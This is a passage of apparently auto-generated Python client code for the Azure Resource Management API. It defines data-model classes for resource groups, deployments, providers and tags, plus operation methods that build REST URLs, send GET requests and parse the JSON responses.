super(DeploymentOperationsListResult, self).__init__(**kwargs)
self._operations = kwargs.get('operations')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def operations(self):
"""
Gets or sets the list of deployments.
"""
return self._operations
@operations.setter
def operations(self, value):
self._operations = value
class DeploymentOperationsListParameters(object):
"""
Deployment operation list parameters.
"""
def __init__(self, **kwargs):
self._top = kwargs.get('top')
@property
def top(self):
"""
Get or sets the number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceProviderOperationDetailListResult(AzureOperationResponse):
"""
List of resource provider operations.
"""
def __init__(self, **kwargs):
super(ResourceProviderOperationDetailListResult, self).__init__(**kwargs)
self._resource_provider_operation_details = kwargs.get('resource_provider_operation_details')
@property
def resource_provider_operation_details(self):
"""
Gets or sets the list of resource provider operations.
"""
return self._resource_provider_operation_details
@resource_provider_operation_details.setter
def resource_provider_operation_details(self, value):
self._resource_provider_operation_details = value
class ResourceGroupExistsResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupExistsResult, self).__init__(**kwargs)
self._exists = kwargs.get('exists')
@property
def exists(self):
"""
Gets or sets the value indicating whether the resource group exists.
"""
return self._exists
@exists.setter
def exists(self, value):
self._exists = value
class ResourceGroupCreateOrUpdateResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupCreateOrUpdateResult, self).__init__(**kwargs)
self._resource_group = kwargs.get('resource_group')
@property
def resource_group(self):
"""
Gets or sets the resource group.
"""
return self._resource_group
@resource_group.setter
def resource_group(self, value):
self._resource_group = value
class ResourceGroup(object):
"""
Resource group information.
"""
def __init__(self, **kwargs):
self._location = kwargs.get('location')
self._properties = kwargs.get('properties')
self._tags = kwargs.get('tags')
self._provisioning_state = kwargs.get('provisioning_state')
@property
def location(self):
"""
Gets or sets the location of the resource group. It cannot be changed
after the resource group has been created. Has to be one of the
supported Azure Locations, such as West US, East US, West Europe,
East Asia, etc.
"""
return self._location
@location.setter
def location(self, value):
self._location = value
@property
def properties(self):
"""
Gets or sets the resource group properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
@property
def provisioning_state(self):
"""
Gets or sets resource group provisioning state.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def tags(self):
"""
Gets or sets the tags attached to the resource group.
"""
return self._tags
@tags.setter
def tags(self, value):
self._tags = value
class ResourceGroupGetResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupGetResult, self).__init__(**kwargs)
self._resource_group = kwargs.get('resource_group')
@property
def resource_group(self):
"""
Gets or sets the resource group.
"""
return self._resource_group
@resource_group.setter
def resource_group(self, value):
self._resource_group = value
class ResourceGroupListResult(AzureOperationResponse):
"""
List of resource groups.
"""
def __init__(self, **kwargs):
super(ResourceGroupListResult, self).__init__(**kwargs)
self._resource_groups = kwargs.get('resource_groups')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def resource_groups(self):
"""
Gets or sets the list of resource groups.
"""
return self._resource_groups
@resource_groups.setter
def resource_groups(self, value):
self._resource_groups = value
class ResourceGroupListParameters(object):
"""
Resource group information.
"""
def __init__(self, **kwargs):
self._tag_name = kwargs.get('tag_name')
self._tag_value = kwargs.get('tag_value')
self._top = kwargs.get('top')
@property
def tag_name(self):
"""
Filter the results based on a particular tag name. Optional.
"""
return self._tag_name
@tag_name.setter
def tag_name(self, value):
self._tag_name = value
@property
def tag_value(self):
"""
Filter the results for a tag name along with a particular tag value.
Optional.
"""
return self._tag_value
@tag_value.setter
def tag_value(self, value):
self._tag_value = value
@property
def top(self):
"""
Number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceGroupPatchResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupPatchResult, self).__init__(**kwargs)
self._resource_group = kwargs.get('resource_group')
@property
def resource_group(self):
"""
Gets or sets the resource group.
"""
return self._resource_group
@resource_group.setter
def resource_group(self, value):
self._resource_group = value
class DeploymentValidateResponse(AzureOperationResponse):
"""
Information from validate template deployment response.
"""
def __init__(self, **kwargs):
super(DeploymentValidateResponse, self).__init__(**kwargs)
self._is_valid = kwargs.get('is_valid')
self._error = kwargs.get('error')
self._properties = kwargs.get('properties')
@property
def error(self):
"""
Gets or sets validation error.
"""
return self._error
@error.setter
def error(self, value):
self._error = value
@property
def is_valid(self):
"""
Gets or sets the value indicating whether the template is valid or not.
"""
return self._is_valid
@is_valid.setter
def is_valid(self, value):
self._is_valid = value
@property
def properties(self):
"""
Gets or sets the template deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class Deployment(object):
"""
Deployment operation parameters.
"""
def __init__(self, **kwargs):
self._properties = kwargs.get('properties')
@property
def properties(self):
"""
Gets or sets the deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class DeploymentOperationsCreateResult(AzureOperationResponse):
"""
Template deployment operation create result.
"""
def __init__(self, **kwargs):
super(DeploymentOperationsCreateResult, self).__init__(**kwargs)
self._deployment = kwargs.get('deployment')
@property
def deployment(self):
"""
Gets or sets the deployment.
"""
return self._deployment
@deployment.setter
def deployment(self, value):
self._deployment = value
class DeploymentGetResult(AzureOperationResponse):
"""
Template deployment information.
"""
def __init__(self, **kwargs):
super(DeploymentGetResult, self).__init__(**kwargs)
self._deployment = kwargs.get('deployment')
@property
def deployment(self):
"""
Gets or sets the deployment.
"""
return self._deployment
@deployment.setter
def deployment(self, value):
self._deployment = value
class DeploymentListResult(AzureOperationResponse):
"""
List of deployments.
"""
def __init__(self, **kwargs):
super(DeploymentListResult, self).__init__(**kwargs)
self._deployments = kwargs.get('deployments')
self._next_link = kwargs.get('next_link')
@property
def deployments(self):
"""
Gets or sets the list of deployments.
"""
return self._deployments
@deployments.setter
def deployments(self, value):
self._deployments = value
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
class DeploymentListParameters(object):
"""
Deployment list operation parameters.
"""
def __init__(self, **kwargs):
self._top = kwargs.get('top')
self._provisioning_state = kwargs.get('provisioning_state')
@property
def provisioning_state(self):
"""
Get or sets the provisioning state to filer by. Optional.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def top(self):
"""
Get or sets the number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceManagementError(object):
def __init__(self, **kwargs):
self._code = kwargs.get('code')
self._message = kwargs.get('message')
self._target = kwargs.get('target')
@property
def code(self):
"""
Gets or sets the error code returned from the server.
"""
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def message(self):
"""
Gets or sets the error message returned from the server.
"""
return self._message
@message.setter
def message(self, value):
self._message = value
@property
def target(self):
"""
Gets or sets the target of the error.
"""
return self._target
@target.setter
def target(self, value):
self._target = value
class ResourceManagementErrorWithDetails(ResourceManagementError):
def __init__(self, **kwargs):
super(ResourceManagementErrorWithDetails, self).__init__(**kwargs)
self._details = kwargs.get('details')
@property
def details(self):
"""
Gets or sets validation error.
"""
return self._details
@details.setter
def details(self, value):
self._details = value
class Provider(AzureOperationResponse):
"""
Resource provider information.
"""
def __init__(self, **kwargs):
super(Provider, self).__init__(**kwargs)
self._id = kwargs.get('id')
self._namespace = kwargs.get('namespace')
self._registration_state = kwargs.get('registration_state')
self._resource_types = kwargs.get('resource_types')
@property
def id(self):
"""
Gets or sets the provider id.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def namespace(self):
"""
Gets or sets the namespace of the provider.
"""
return self._namespace
@namespace.setter
def namespace(self, value):
self._namespace = value
@property
def registration_state(self):
"""
Gets or sets the registration state of the provider.
"""
return self._registration_state
@registration_state.setter
def registration_state(self, value):
self._registration_state = value
@property
def resource_types(self):
"""
Gets or sets the collection of provider resource types.
"""
return self._resource_types
@resource_types.setter
def resource_types(self, value):
self._resource_types = value
class ProviderRegistrationState(object):
"""
Provider registration states.
"""
not_registered = 'NotRegistered'
unregistering = 'Unregistering'
registering = 'Registering'
registered = 'Registered'
class ProviderResourceType(object):
"""
Resource type managed by the resource provider.
"""
def __init__(self, **kwargs):
self._name = kwargs.get('name')
self._locations = kwargs.get('locations')
self._api_versions = kwargs.get('api_versions')
self._properties = kwargs.get('properties')
@property
def api_versions(self):
"""
Gets or sets the api version.
"""
return self._api_versions
@api_versions.setter
def api_versions(self, value):
self._api_versions = value
@property
def locations(self):
"""
Gets or sets the collection of locations where this resource type can
be created in.
"""
return self._locations
@locations.setter
def locations(self, value):
self._locations = value
@property
def name(self):
"""
Gets or sets the resource type.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def properties(self):
"""
Gets or sets the properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class GenericResourceExtended(ResourceBaseExtended):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(GenericResourceExtended, self).__init__(**kwargs)
self._properties = kwargs.get('properties')
self._provisioning_state = kwargs.get('provisioning_state')
self._plan = kwargs.get('plan')
@property
def plan(self):
"""
Gets or sets the plan of the resource.
"""
return self._plan
@plan.setter
def plan(self, value):
self._plan = value
@property
def properties(self):
"""
Gets or sets the resource properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
@property
def provisioning_state(self):
"""
Gets or sets resource provisioning state.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
class ProvisioningState(object):
"""
Common provisioning states.
"""
not_specified = 'NotSpecified'
accepted = 'Accepted'
running = 'Running'
registering = 'Registering'
creating = 'Creating'
created = 'Created'
deleting = 'Deleting'
deleted = 'Deleted'
canceled = 'Canceled'
failed = 'Failed'
succeeded = 'Succeeded'
class Plan(object):
"""
Plan for the resource.
"""
def __init__(self, **kwargs):
self._name = kwargs.get('name')
self._publisher = kwargs.get('publisher')
self._product = kwargs.get('product')
self._promotion_code = kwargs.get('promotion_code')
@property
def name(self):
"""
Gets or sets the plan ID.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def product(self):
"""
Gets or sets the offer ID.
"""
return self._product
@product.setter
def product(self, value):
self._product = value
@property
def promotion_code(self):
"""
Gets or sets the promotion code.
"""
return self._promotion_code
@promotion_code.setter
def promotion_code(self, value):
self._promotion_code = value
@property
def publisher(self):
"""
Gets or sets the publisher ID.
"""
return self._publisher
@publisher.setter
def publisher(self, value):
self._publisher = value
class TagValue(object):
"""
Tag information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._value = kwargs.get('value')
self._count = kwargs.get('count')
@property
def count(self):
"""
Gets or sets the tag value count.
"""
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def id(self):
"""
Gets or sets the tag ID.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def value(self):
"""
Gets or sets the tag value.
"""
return self._value
@value.setter
def value(self, value):
self._value = value
class TagCount(object):
"""
Tag count.
"""
def __init__(self, **kwargs):
self._type = kwargs.get('type')
self._value = kwargs.get('value')
@property
def type(self):
"""
Type of count.
"""
return self._type
@type.setter
def type(self, value):
self._type = value
@property
def value(self):
"""
Value of count.
"""
return self._value
@value.setter
def value(self, value):
self._value = value
class TagDetails(object):
"""
Tag details.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._name = kwargs.get('name')
self._count = kwargs.get('count')
self._values = kwargs.get('values')
@property
def count(self):
"""
Gets or sets the tag count.
"""
return self._count
@count.setter
def count(self, value):
self._count = value
@property
def id(self):
"""
Gets or sets the tag ID.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
"""
Gets or sets the tag name.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def values(self):
"""
Gets or sets the list of tag values.
"""
return self._values
@values.setter
def values(self, value):
self._values = value
class DeploymentOperation(object):
"""
Deployment operation information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._operation_id = kwargs.get('operation_id')
self._properties = kwargs.get('properties')
@property
def id(self):
"""
Gets or sets full deployment operation id.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def operation_id(self):
"""
Gets or sets deployment operation id.
"""
return self._operation_id
@operation_id.setter
def operation_id(self, value):
self._operation_id = value
@property
def properties(self):
"""
Gets or sets deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class DeploymentOperationProperties(object):
"""
Deployment operation properties.
"""
def __init__(self, **kwargs):
self._provisioning_state = kwargs.get('provisioning_state')
self._timestamp = kwargs.get('timestamp')
self._status_code = kwargs.get('status_code')
self._status_message = kwargs.get('status_message')
self._target_resource = kwargs.get('target_resource')
@property
def provisioning_state(self):
"""
Gets or sets the state of the provisioning.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def status_code(self):
"""
Gets or sets operation status code.
"""
return self._status_code
@status_code.setter
def status_code(self, value):
self._status_code = value
@property
def status_message(self):
"""
Gets or sets operation status message.
"""
return self._status_message
@status_message.setter
def status_message(self, value):
self._status_message = value
@property
def target_resource(self):
"""
Gets or sets the target resource.
"""
return self._target_resource
@target_resource.setter
def target_resource(self, value):
self._target_resource = value
@property
def timestamp(self):
"""
Gets or sets the date and time of the operation.
"""
return self._timestamp
@timestamp.setter
def timestamp(self, value):
self._timestamp = value
class TargetResource(object):
"""
Target resource.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._resource_name = kwargs.get('resource_name')
self._resource_type = kwargs.get('resource_type')
@property
def id(self):
"""
Gets or sets the ID of the resource.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def resource_name(self):
"""
Gets or sets the name of the resource.
"""
return self._resource_name
@resource_name.setter
def resource_name(self, value):
self._resource_name = value
@property
def resource_type(self):
"""
Gets or sets the type of the resource.
"""
return self._resource_type
@resource_type.setter
def resource_type(self, value):
self._resource_type = value
class ResourceProviderOperationDefinition(object):
"""
Resource provider operation information.
"""
def __init__(self, **kwargs):
self._name = kwargs.get('name')
self._resource_provider_operation_display_properties = kwargs.get('resource_provider_operation_display_properties')
@property
def name(self):
"""
Gets or sets the provider operation name.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def resource_provider_operation_display_properties(self):
"""
Gets or sets the display property of the provider operation.
"""
return self._resource_provider_operation_display_properties
@resource_provider_operation_display_properties.setter
def resource_provider_operation_display_properties(self, value):
self._resource_provider_operation_display_properties = value
class ResourceProviderOperationDisplayProperties(object):
"""
Resource provider operation's display properties.
"""
def __init__(self, **kwargs):
self._publisher = kwargs.get('publisher')
self._provider = kwargs.get('provider')
self._resource = kwargs.get('resource')
self._operation = kwargs.get('operation')
self._description = kwargs.get('description')
@property
def description(self):
"""
Gets or sets operation description.
"""
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def operation(self):
"""
Gets or sets operation.
"""
return self._operation
@operation.setter
def operation(self, value):
self._operation = value
@property
def provider(self):
"""
Gets or sets operation provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
@property
def publisher(self):
"""
Gets or sets operation description.
"""
return self._publisher
@publisher.setter
def publisher(self, value):
self._publisher = value
@property
def resource(self):
"""
Gets or sets operation resource.
"""
return self._resource
@resource.setter
def resource(self, value):
self._resource = value
class ResourceGroupExtended(ResourceGroup):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceGroupExtended, self).__init__(**kwargs)
self._id = kwargs.get('id')
self._name = kwargs.get('name')
@property
def id(self):
"""
Gets or sets the ID of the resource group.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
"""
Gets or sets the Name of the resource group.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
class DeploymentProperties(object):
"""
Deployment properties.
"""
def __init__(self, **kwargs):
self._template = kwargs.get('template')
self._template_link = kwargs.get('template_link')
self._parameters = kwargs.get('parameters')
self._parameters_link = kwargs.get('parameters_link')
self._mode = kwargs.get('mode')
@property
def mode(self):
"""
Gets or sets the deployment mode.
"""
return self._mode
@mode.setter
def mode(self, value):
self._mode = value
@property
def parameters(self):
"""
Deployment parameters. Use only one of Parameters or ParametersLink.
"""
return self._parameters
@parameters.setter
def parameters(self, value):
self._parameters = value
@property
def parameters_link(self):
"""
Gets or sets the URI referencing the parameters. Use only one of
Parameters or ParametersLink.
"""
return self._parameters_link
@parameters_link.setter
def parameters_link(self, value):
self._parameters_link = value
@property
def template(self):
"""
Gets or sets the template content. Use only one of Template or
TemplateLink.
"""
return self._template
@template.setter
def template(self, value):
self._template = value
@property
def template_link(self):
"""
Gets or sets the URI referencing the template. Use only one of
Template or TemplateLink.
"""
return self._template_link
@template_link.setter
def template_link(self, value):
self._template_link = value
class DeploymentPropertiesExtended(DeploymentProperties):
"""
Deployment properties with additional details.
"""
def __init__(self, **kwargs):
super(DeploymentPropertiesExtended, self).__init__(**kwargs)
self._provisioning_state = kwargs.get('provisioning_state')
self._correlation_id = kwargs.get('correlation_id')
self._timestamp = kwargs.get('timestamp')
self._outputs = kwargs.get('outputs')
self._providers = kwargs.get('providers')
self._dependencies = kwargs.get('dependencies')
@property
def correlation_id(self):
"""
Gets or sets the correlation ID of the deployment.
"""
return self._correlation_id
@correlation_id.setter
def correlation_id(self, value):
self._correlation_id = value
@property
def dependencies(self):
"""
Gets the list of deployment dependencies.
"""
return self._dependencies
@dependencies.setter
def dependencies(self, value):
self._dependencies = value
@property
def outputs(self):
"""
Gets or sets key/value pairs that represent deploymentoutput.
"""
return self._outputs
@outputs.setter
def outputs(self, value):
self._outputs = value
@property
def providers(self):
"""
Gets the list of resource providers needed for the deployment.
"""
return self._providers
@providers.setter
def providers(self, value):
self._providers = value
@property
def provisioning_state(self):
"""
Gets or sets the state of the provisioning.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
@property
def timestamp(self):
"""
Gets or sets the timestamp of the template deployment.
"""
return self._timestamp
@timestamp.setter
def timestamp(self, value):
self._timestamp = value
class TemplateLink(object):
"""
Entity representing the reference to the template.
"""
def __init__(self, **kwargs):
self._uri = kwargs.get('uri')
self._content_version = kwargs.get('content_version')
@property
def content_version(self):
"""
If included it must match the ContentVersion in the template.
"""
return self._content_version
@content_version.setter
def content_version(self, value):
self._content_version = value
@property
def uri(self):
"""
URI referencing the template.
"""
return self._uri
@uri.setter
def uri(self, value):
self._uri = value
class ParametersLink(object):
"""
Entity representing the reference to the deployment paramaters.
"""
def __init__(self, **kwargs):
self._uri = kwargs.get('uri')
self._content_version = kwargs.get('content_version')
@property
def content_version(self):
"""
If included it must match the ContentVersion in the template.
"""
return self._content_version
@content_version.setter
def content_version(self, value):
self._content_version = value
@property
def uri(self):
"""
URI referencing the template.
"""
return self._uri
@uri.setter
def uri(self, value):
self._uri = value
class DeploymentMode(object):
"""
Specifies the deployment type for the deployment operations.
"""
incremental = "Incremental"
class BasicDependency(object):
"""
Deployment dependency information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._resource_type = kwargs.get('resource_type')
self._resource_name = kwargs.get('resource_name')
@property
def id(self):
"""
Gets or sets the ID of the dependency.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def resource_name(self):
"""
Gets or sets the dependency resource name.
"""
return self._resource_name
@resource_name.setter
def resource_name(self, value):
self._resource_name = value
@property
def resource_type(self):
"""
Gets or sets the dependency resource type.
"""
return self._resource_type
@resource_type.setter
def resource_type(self, value):
self._resource_type = value
class Dependency(BasicDependency):
"""
Deployment dependency information.
"""
def __init__(self, **kwargs):
super(Dependency, self).__init__(**kwargs)
self._depends_on = kwargs.get('depends_on')
@property
def depends_on(self):
"""
Gets the list of dependencies.
"""
return self._depends_on
@depends_on.setter
def depends_on(self, value):
self._depends_on = value
class DeploymentExtended(object):
"""
Deployment information.
"""
def __init__(self, **kwargs):
self._id = kwargs.get('id')
self._name = kwargs.get('name')
self._properties = kwargs.get('properties')
@property
def id(self):
"""
Gets or sets the ID of the deployment.
"""
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def name(self):
"""
Gets or sets the name of the deployment.
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def properties(self):
"""
Gets or sets deployment properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
class ResourceIdentity:
def __init__(self, **kwargs):
self.resource_name = kwargs.get('resource_name')
self.resource_provider_api_version = kwargs.get('api_version')
self.resource_provider_namespace = kwargs.get('resource_namespace')
self.resource_type = kwargs.get('resource_type')
self.parent_resource_path = kwargs.get('parent_resource_path')
class ResourceManagementClient(Service):
@property
def api_version(self):
"""
Gets the API version.
"""
return self._api_version
@property
def long_running_operation_initial_timeout(self):
"""
Gets or sets the initial timeout for Long Running Operations.
"""
return self._long_running_operation_initial_timeout
@long_running_operation_initial_timeout.setter
def long_running_operation_initial_timeout(self, value):
self._long_running_operation_initial_timeout = value
@property
def long_running_operation_retry_timeout(self):
"""
Gets or sets the retry timeout for Long Running Operations.
"""
return self._long_running_operation_retry_timeout
@long_running_operation_retry_timeout.setter
def long_running_operation_retry_timeout(self, value):
self._long_running_operation_retry_timeout = value
@property
def deployment_operations(self):
"""
Operations for managing deployment operations.
"""
return self._deployment_operations
@property
def deployments(self):
"""
Operations for managing deployments.
"""
return self._deployments
@property
def providers(self):
"""
Operations for managing providers.
"""
return self._providers
@property
def resource_groups(self):
"""
Operations for managing resource groups.
"""
return self._resource_groups
@property
def resources(self):
"""
Operations for managing resources.
"""
return self._resources
@property
def resource_provider_operation_details(self):
"""
Operations for managing Resource provider operations.
"""
return self._resource_provider_operation_details
@property
def tags(self):
"""
Operations for managing tags.
"""
return self._tags
def __init__(self, credentials, **kwargs):
super(ResourceManagementClient, self).__init__(credentials, **kwargs)
if getattr(self, '_base_uri', None) is None:
self._base_uri = 'https://management.azure.com/'
if getattr(self, '_api_version', None) is None:
self._api_version = '2014-04-01-preview'
if getattr(self, '_long_running_operation_initial_timeout', None) is None:
self._long_running_operation_initial_timeout = -1
if getattr(self, '_long_running_operation_retry_timeout', None) is None:
self._long_running_operation_retry_timeout = -1
self._deployment_operations = DeploymentOperationOperations(self)
self._deployments = DeploymentOperations(self)
self._providers = ProviderOperations(self)
self._resource_groups = ResourceGroupOperations(self)
self._resources = ResourceOperations(self)
self._resource_provider_operation_details = ResourceProviderOperationDetailsOperations(self)
self._tags = TagOperations(self)
def get_long_running_operation_status(self, operation_status_link):
"""
The Get Operation Status operation returns the status of the specified
operation. After calling an asynchronous operation, you can call Get
Operation Status to determine whether the operation has succeeded,
failed, or is still in progress.
Args:
operation_status_link (string): Location value returned by the Begin
operation.
Returns:
LongRunningOperationResponse: A standard service response for long
running operations.
"""
# Validate
if operation_status_link is None:
raise ValueError('operation_status_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + operation_status_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['x-ms-version'] = '2014-04-01-preview'
# Send Request
response = self.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 202:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = LongRunningOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 409:
result.status = OperationStatus.Failed
if status_code == 200:
result.status = OperationStatus.Succeeded
return result
class DeploymentOperationOperations(object):
"""
Operations for managing deployment operations.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def get(self, resource_group_name, deployment_name, operation_id):
"""
Get a list of deployments operations.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
operation_id (string): Operation Id.
Returns:
DeploymentOperationsGetResult: Deployment operation.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
if operation_id is None:
raise ValueError('operation_id cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/operations/'
url = url + quote(operation_id)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentOperationsGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
operation_instance = DeploymentOperation()
result.operation = operation_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
operation_instance.id = id_instance
operation_id_value = response_doc.get('operationId', None)
if operation_id_value is not None:
operation_id_instance = operation_id_value
operation_instance.operation_id = operation_id_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentOperationProperties()
operation_instance.properties = properties_instance
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
status_code_value = properties_value.get('statusCode', None)
if status_code_value is not None:
status_code_instance = status_code_value
properties_instance.status_code = status_code_instance
status_message_value = properties_value.get('statusMessage', None)
if status_message_value is not None:
status_message_instance = json.dumps(status_message_value)
properties_instance.status_message = status_message_instance
target_resource_value = properties_value.get('targetResource', None)
if target_resource_value is not None:
target_resource_instance = TargetResource()
properties_instance.target_resource = target_resource_instance
id_value2 = target_resource_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
target_resource_instance.id = id_instance2
resource_name_value = target_resource_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
target_resource_instance.resource_name = resource_name_instance
resource_type_value = target_resource_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
target_resource_instance.resource_type = resource_type_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, resource_group_name, deployment_name, parameters):
"""
Gets a list of deployments operations.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
parameters (DeploymentOperationsListParameters): Query parameters.
Returns:
DeploymentOperationsListResult: List of deployment operations.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/operations'
query_parameters = []
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = DeploymentOperationsListResult(operations=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
deployment_operation_instance = DeploymentOperation()
result.operations.append(deployment_operation_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
deployment_operation_instance.id = id_instance
operation_id_value = value_value.get('operationId', None)
if operation_id_value is not None:
operation_id_instance = operation_id_value
deployment_operation_instance.operation_id = operation_id_instance
properties_value = value_value.get('properties', None)
if properties_value is not None:
properties_instance = DeploymentOperationProperties()
